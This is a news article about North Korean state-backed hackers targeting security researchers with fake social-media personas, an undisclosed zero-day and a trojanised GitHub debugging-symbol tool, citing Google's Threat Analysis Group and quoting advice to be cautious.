This time, they're creating elaborate impostor profiles and using a fresh zero-day and a fake Windows tool to lure in the suspecting.

3 Min Read
North Korean flag
Source: Panther Media

North Korean state-supported threat actors are targeting security researchers — the second such campaign in the last few years.

Google first discovered DPRK attackers weren't going after innocent, vulnerable individuals or organizations in January 2021, but rather the cybersecurity professionals themselves. Now the attackers are back, with an all new zero-day vulnerability, a fake software tool, and some remarkably extensive phishing to go along with it, according to a new blog post from Google's Threat Analysis Group.

"Unfortunately, the targeting of those involved in cybersecurity research is not rare. In fact, it has grown more frequent and sophisticated over the years," says Callie Guenther, cyber threat research senior manager at Critical Start. "These operations are multifaceted, aiming not just to steal information but also to gain insights into defense mechanisms, refine their tactics, and better evade future detection."

Social Engineering for Security Engineers

Researchers from Google first caught wind of this strange hacker outfit more than two years ago, when it began to pepper the inboxes of security professionals on social media. The accounts in question were given largely generic-sounding American names like "James Willy" and "Billy Brown," and the social engineers even created real cybersecurity research content in order to lend legitimacy to their fake personas.

That level of effort is on display once again in their latest campaign. For example, using a since-deactivated account on X (formerly Twitter), the attackers conducted a monthslong conversation with one of their targets, discussing areas of shared interest and the possibility of a future collaboration.

Conversations then typically moved to an encrypted messaging app like Signal or WhatsApp. Once sufficient trust was established, the threat actor would finally forward a file containing a zero-day vulnerability in a popular software package. (Google is withholding further details about either, until the vendor has had time to patch.)

If the victim fell for the bait and executed the file, the downloaded shellcode would first check if it's running on a virtual machine — in which case, it would be ineffectual — before sending information about the compromised device, including a screenshot, to attacker-controlled command-and-control (C2) infrastructure.

Cops and Robbers

Besides this more involved path, the attackers appear to have concocted one more lax method to ensnare the average researcher passerby.

From the Github account dbgsymbol, the attackers extend their researcher persona, posting proofs-of-concept (PoCs) and security "tools." The most popular among them — "getsymbol," published last September, and updated multiple times since — markets itself as a "simple tool to download debugging symbols from Microsoft, Google, Mozilla, and Citrix symbol servers for reverse engineers compatible with Windows 8.1, 10 and 11."

getsymbol actually does what it says it does. However, it also enables the developers to run arbitrary code on the machine of any researcher who downloaded it. It has been forked 23 times as of this writing.

As the protectors of digital security worldwide, Guenther emphasizes, security professionals need to make extra certain that they don't succumb to these sorts of tricks.

"The hacking of security researchers is not just about a single successful breach," she says, nor is it just a game to these adversaries. "It's a strategic move. Security researchers are on the forefront of discovering vulnerabilities and developing mitigation techniques. By infiltrating their systems, malicious actors can gain access to yet-to-be-disclosed vulnerabilities, proprietary tools, and valuable databases of threat intelligence. Furthermore, these researchers might be involved in projects of national significance, making them attractive targets for espionage."

In an email to Dark Reading, Google TAG offered some advice for potential targets: "Be extremely cautious about what you run and open from unknown third parties. This group has shown they're willing to invest the time to build rapport before attempting any malicious actions."

About the Author(s)

Nate Nelson, Contributing Writer

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

You May Also Like


More Insights